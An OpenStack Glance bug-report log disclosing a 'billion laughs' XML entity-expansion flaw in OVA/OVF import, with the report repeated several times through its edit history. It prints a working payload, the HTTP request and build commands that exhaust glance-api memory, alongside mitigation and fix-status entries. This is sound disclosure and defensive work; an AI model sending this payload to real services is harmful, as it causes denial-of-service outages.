Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
|
2016-09-20 01:04:23 |
Tristan Cacqueray |
bug |
|
|
added subscriber Glance Core security contacts |
2016-09-20 15:28:56 |
Nikhil Komawar |
glance: status |
New |
Opinion |
|
2016-09-20 15:29:00 |
Nikhil Komawar |
glance: importance |
Undecided |
Low |
|
2016-09-27 14:11:06 |
Tristan Cacqueray |
ossa: status |
New |
Incomplete |
|
2016-09-27 14:15:05 |
Tristan Cacqueray |
bug |
|
|
added subscriber OSSG CoreSec |
2016-09-27 14:15:10 |
Tristan Cacqueray |
ossa: status |
Incomplete |
Opinion |
|
2016-09-27 18:49:37 |
Jeremy Stanley |
information type |
Private Security |
Public |
|
2016-09-28 20:59:54 |
Jeremy Stanley |
description |
This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
|
2018-01-31 22:18:11 |
Brian Rosmaita |
glance: milestone |
|
queens-rc1 |
|
2018-01-31 22:18:29 |
Brian Rosmaita |
glance: status |
Opinion |
In Progress |
|
2018-01-31 22:19:01 |
Brian Rosmaita |
glance: assignee |
|
Vladislav Kuzmin (vkuzmin-u) |
|
2018-02-08 03:23:13 |
Brian Rosmaita |
glance: status |
In Progress |
Fix Released |
|
2018-02-08 03:23:13 |
Brian Rosmaita |
glance: assignee |
Vladislav Kuzmin (vkuzmin-u) |
|
|